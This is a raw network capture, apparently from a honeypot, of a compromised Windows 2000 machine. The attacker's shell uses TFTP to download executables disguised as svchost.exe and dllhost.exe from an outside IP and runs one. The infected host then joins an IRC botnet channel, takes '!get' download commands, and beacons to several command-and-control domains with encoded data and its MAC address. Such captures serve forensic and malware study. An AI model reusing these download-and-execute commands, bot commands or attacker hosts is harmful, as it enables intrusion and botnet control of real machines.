VICTIM: Microsoft Windows 2000 [Version 5.00.2195]
VICTIM: (C) Copyright 1985-2000 Microsoft Corp.C:\\WINNT\\system32>
VICTIM: dir wins\\dllhost.exe
VICTIM: Volume in drive C has no label. Volume Serial Number is F07B-A028 Directory of C:\\WINNT\\system32\\winsFile Not FoundC:\\WINNT\\system32>
VICTIM: dir dllcache\\tftpd.exe
VICTIM: Volume in drive C has no label. Volume Serial Number is F07B-A028 Directory of C:\\WINNT\\system32\\dllcacheFile Not FoundC:\\WINNT\\system32>
VICTIM: tftp -i 175.124.188.24 get svchost.exe wins\\SVCHOST.EXE
VICTIM: \000\001svchost.exe\000octet\000
VICTIM: \000\004\000\001
VICTIM: \000\004\000\002
VICTIM: \000\004\000\003
VICTIM: \000\004\000\004
VICTIM: \000\004\000\005
VICTIM: \000\004\000\006
VICTIM: \000\004\000\007
VICTIM: \000\004\000\010
VICTIM: \000\004\000\t
VICTIM: \000\004\000
VICTIM: \000\004\000\013
VICTIM: \000\004\000\014
VICTIM: \000\004\000
VICTIM: \000\004\000\016
VICTIM: \000\004\000\017
VICTIM: \000\004\000\020
VICTIM: \000\004\000\021
VICTIM: \000\004\000\022
VICTIM: \000\004\000\023
VICTIM: \000\004\000\024
VICTIM: \000\004\000\025
VICTIM: \000\004\000\026
VICTIM: \000\004\000\027
VICTIM: \000\004\000\030
VICTIM: \000\004\000\031
VICTIM: \000\004\000\032
VICTIM: \000\004\000\033
VICTIM: \000\004\000\034
VICTIM: \000\004\000\035
VICTIM: \000\004\000\036
VICTIM: \000\004\000\037
VICTIM: \000\004\000
VICTIM: \000\004\000!
VICTIM: \000\004\000\
VICTIM: \000\004\000#
VICTIM: \000\004\000\$
VICTIM: \000\004\000%
VICTIM: \000\004\000&
VICTIM: \000\004\000'
VICTIM: \000\004\000(
VICTIM: \000\004\000)
VICTIM: \000\004\000*
VICTIM: \000\004\000+
VICTIM: \000\004\000,
VICTIM: \000\004\000-
VICTIM: \000\004\000.
VICTIM: \000\004\000/
VICTIM: \000\004\0000
VICTIM: \000\004\0001
VICTIM: \000\004\0002
VICTIM: \000\004\0003
VICTIM: \000\004\0004
VICTIM: \000\004\0005
VICTIM: \000\004\0006
VICTIM: \000\004\0007
VICTIM: \000\004\0008
VICTIM: \000\004\0009
VICTIM: \000\004\000:
VICTIM: \000\004\000;
VICTIM: \000\004\000<
VICTIM: \000\004\000=
VICTIM: \000\004\000>
VICTIM: \000\004\000?
VICTIM: \000\004\000@
VICTIM: \000\004\000A
VICTIM: \000\004\000B
VICTIM: \000\004\000C
VICTIM: \000\004\000D
VICTIM: \000\004\000E
VICTIM: \000\004\000F
VICTIM: \000\004\000G
VICTIM: \000\004\000H
VICTIM: \000\004\000I
VICTIM: \000\004\000J
VICTIM: \000\004\000K
VICTIM: \000\004\000L
VICTIM: \000\004\000M
VICTIM: \000\004\000N
VICTIM: \000\004\000O
VICTIM: \000\004\000P
VICTIM: \000\004\000Q
VICTIM: \000\004\000R
VICTIM: \000\004\000S
VICTIM: \000\004\000T
VICTIM: \000\004\000U
VICTIM: \000\004\000V
VICTIM: \000\004\000W
VICTIM: \000\004\000X
VICTIM: \000\004\000Y
VICTIM: \000\004\000Z
VICTIM: \000\004\000[
VICTIM: \000\004\000\\
VICTIM: \000\004\000]
VICTIM: \000\004\000^
VICTIM: \000\004\000_
VICTIM: \000\004\000`
VICTIM: \000\004\000a
VICTIM: \000\004\000b
VICTIM: \000\004\000c
VICTIM: \000\004\000d
VICTIM: \000\004\000e
VICTIM: \000\004\000f
VICTIM: \000\004\000g
VICTIM: \000\004\000h
VICTIM: \000\004\000i
VICTIM: \000\004\000j
VICTIM: \000\004\000k
VICTIM: \000\004\000l
VICTIM: \000\004\000m
VICTIM: \000\004\000n
VICTIM: \000\004\000o
VICTIM: \000\004\000p
VICTIM: \000\004\000q
VICTIM: \000\004\000r
VICTIM: \000\004\000s
VICTIM: \000\004\000t
VICTIM: \000\004\000u
VICTIM: \000\004\000v
VICTIM: \000\004\000w
VICTIM: \000\004\000x
VICTIM: \000\004\000y
VICTIM: \000\004\000z
VICTIM: \000\004\000{
VICTIM: \000\004\000|
VICTIM: \000\004\000}
VICTIM: \000\004\000~
VICTIM: Transfer successful: 64272 bytes in 50 seconds, 1285 bytes/s
VICTIM: C:\\WINNT\\system32>
VICTIM: \000\001dllhost.exe\000octet\000
VICTIM: \000\004\000\001
VICTIM: tftp -i 175.124.188.24 get dllhost.exe wins\\DLLHOST.EXE
VICTIM: \000\004\000\002
VICTIM: \000\004\000\003
VICTIM: \000\004\000\004
VICTIM: \000\004\000\005
VICTIM: \000\004\000\006
VICTIM: \000\004\000\007
VICTIM: \000\004\000\010
VICTIM: \000\004\000\t
VICTIM: \000\004\000
VICTIM: \000\004\000\013
VICTIM: \000\004\000\014
VICTIM: \000\004\000
VICTIM: \000\004\000\016
VICTIM: \000\004\000\017
VICTIM: \000\004\000\020
VICTIM: \000\004\000\021
VICTIM: \000\004\000\022
VICTIM: \000\004\000\023
VICTIM: \000\004\000\024
VICTIM: \000\004\000\025
VICTIM: \000\004\000\026
VICTIM: \000\004\000\027
VICTIM: \000\004\000\030
VICTIM: \000\004\000\031
VICTIM: \000\004\000\032
VICTIM: \000\004\000\033
VICTIM: \000\004\000\034
VICTIM: \000\004\000\035
VICTIM: \000\004\000\036
VICTIM: \000\004\000\037
VICTIM: \000\004\000
VICTIM: \000\004\000!
VICTIM: \000\004\000\
VICTIM: \000\004\000#
VICTIM: \000\004\000\$
VICTIM: \000\004\000%
VICTIM: \000\004\000&
VICTIM: \000\004\000'
VICTIM: \000\004\000(
VICTIM: Transfer successful: 19968 bytes in 16 seconds, 1248 bytes/s
VICTIM: C:\\WINNT\\system32>
VICTIM: wins\\DLLHOST.EXE
VICTIM: NICK kvdqmbagUSER m020500 . . :-
VICTIM: Service Pack 2JOIN &virtu
ATTACKER: :u. PRIVMSG kvdqmbag :!get http:/88.perfectexe.com:88/kp.jpg:u. PRIVMSG kvdqmbag :!get http:/www.derquda.com/ml1.txt
VICTIM: GET /kp.jpg HTTP/1.0User-Agent: DownloadHost: 88.perfectexe.com:88Pragma: no-cache
ATTACKER: GET /ml1.txt HTTP/1.0User-Agent: DownloadHost: www.derquda.comPragma: no-cache
ATTACKER: GET /list.php?c=B4AC885F94224AE64DAAC6EE0346C213D049B58E0B3869F4DC9ECA9F5FF8F6DFDFE10E13F3845D3386FFC45E0D4897B5778D4CBB9FE6A5F44337&v=2&t=0.3749811 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)Host: justoldleft.ruConnection: Keep-AlivePragma: no-cache
ATTACKER: GET /list.php?c=B4AC885F94224AE64DAAC6EE0346C213D049B58E0B3869F4DC9ECA9F5FF8F6DFDFE10E13F3845D3386FFC45E0D4897B5778D4CBB9FE6A5FF432C&v=2&t=0.9145319 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)Host: w.perfectexe.com:888Connection: Keep-AlivePragma: no-cache
ATTACKER: GET /tm/crypt.exe?t=0.5715143 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)Host: www.derquda.comConnection: Keep-AlivePragma: no-cache
ATTACKER: GET /ck.jpg?t=0.350918 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)Host: 88.perfectexe.com:88Connection: Keep-AlivePragma: no-cache
ATTACKER: GET /sn.php?c=657BF410A434AC09C12FAD9D571E40B33FA7C3F5A0F0FC667C19F3B69E389AB31E54D73BD290A2FC5D685A33C8C18067C2046F84FA5BD8FC2F1A02A8F1591E6F205C2F5BAD7D61FE300AB3C947A967B8DF28A09DD5ABFFF9923054398E7793E9DBBAABB52E35FD60FB4874F39C9C9B01A651220DCB8CA681055CC4ABDE68BF010109389C8FB9CB0ABF8C9BC8D1130183&t=0.727276 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)Host: justoldleft.ruConnection: Keep-AlivePragma: no-cache
ATTACKER: GET /sn.php?c=3C22F3172FBF45E0D23C2C1CCC85D72426BE56601B4BC3591772A4E112B4775E6F258569F7B5732DBA8F264FD0D9F314579138D31CBDCEEACFFAF359C0689EEF661A5B2F449421BEF0CAC2B83FD1DF00E6118EB3106E0D0BB91B3C51CF36B2C86607A5BB839808954BF88016966F25AD39CC297786D5DAE8CADEA0D5DC7EDC26F5E5D573624D21E6DFEA237A91578DF3F42A&t=0.3813288 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)Host: justoldleft.ruConnection: Keep-AlivePragma: no-cache
ATTACKER: GET /sn.php?c=706E48AC04943492EAF2ACF5ADD403F766FBB9D13918824BBAD987C4B36BA589DF8EB85187BE38153902ABC2E5DEBA511FD3F24C66126F3B97F207ADF28DB1C161323A46E12E87183802EE94608E79A654A305381769A2A4339199F408F1067C99F8EDF3BBA026BBD566A3249898D24847B02F0094D33F181F468BE410A659E767602C89FDCF5A9A4477356645859CE3&t=0.4399225 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)Host: w.perfectexe.com:888Connection: Keep-AlivePragma: no-cache
ATTACKER: GET /p6.asp?MAC=00-0C-29-F7-BD-23&Publicer=100 HTTP/1.0User-Agent: CA 0.0.0.2Host: ck.perfectexe.com:89
ATTACKER: GET /sn.php?c=9886DD3971E17CDA3C24C79E730A748094093E56D6F73EF7A5C60142E53D436F41106F861B22634ED8E3026B96AD967D915D1AA4C8BCD48099FCFC56700F3343BBE81A66C8074FD0320894EE00EEEF30BB4C003DEC92E6E0ED4F660BF900364CCDAC8F91667D7CE19E2D8016B1488800F603411F4F1C4B791703E3969F3DF60C7B6BC06C211460A5B1850557E320A82A68B3&t=0.116543 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)Host: w.perfectexe.com:888Connection: Keep-AlivePragma: no-cache
ATTACKER: GET / HTTP/1.0Accept: */*Accept-Language: en-usUser-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)Host: mistfacial.comConnection: Keep-Alive
ATTACKER: GET /sd?s=84893&f=1 HTTP/1.0Accept: */*Referer: http:/mistfacial.com/Accept-Language: en-usUser-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)Host: as.casalemedia.comConnection: Keep-Alive
ATTACKER: GET /sd?s=84893&f=1&C=1 HTTP/1.0Accept: */*Referer: http:/mistfacial.com/Accept-Language: en-usUser-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)Host: as.casalemedia.comConnection: Keep-AliveCookie: CMID=gSx9ZdHt58wAAB4aOlQAAAAC; CMPS=162; CMPP=010
ATTACKER: GET /favicon.ico HTTP/1.0Accept: */*Accept-Language: en-usUser-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)Host: mistfacial.comConnection: Keep-Alive
ATTACKER: GET /favicon.ico HTTP/1.0Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)Host: mistfacial.comConnection: Keep-Alive
ATTACKER: GET /index.php?domain=mistfacial.com HTTP/1.0Accept: */*Referer: http:/mistfacial.com/Accept-Language: en-usUser-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)Host: landing.trafficz.comConnection: Keep-Alive
ATTACKER: GET /css.php?id=78 HTTP/1.0Accept: */*Referer: http:/landing.trafficz.com/index.php?domain=mistfacial.comAccept-Language: en-usUser-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)Host: landing.trafficz.comConnection: Keep-AliveCookie: Apache=192.168.1.188.1301226939458776; mistfacial.com[L]=1301226939; mistfacial.com[U]=1; mistfacial.com[V]=0.3; mistfacial.com[R]=0; mistfacial.com[D]=0; mistfacial.com[OR]=http%3A%2F%2Fmistfacial.com%2F
ATTACKER: PING :k.
ATTACKER: PONG :k.
VICTIM: JOIN &virtu
ATTACKER: PONG :k.
VICTIM: JOIN &virtu
ATTACKER: PONG :k.
VICTIM: JOIN &virtu
ATTACKER: PONG :k.
VICTIM: JOIN &virtu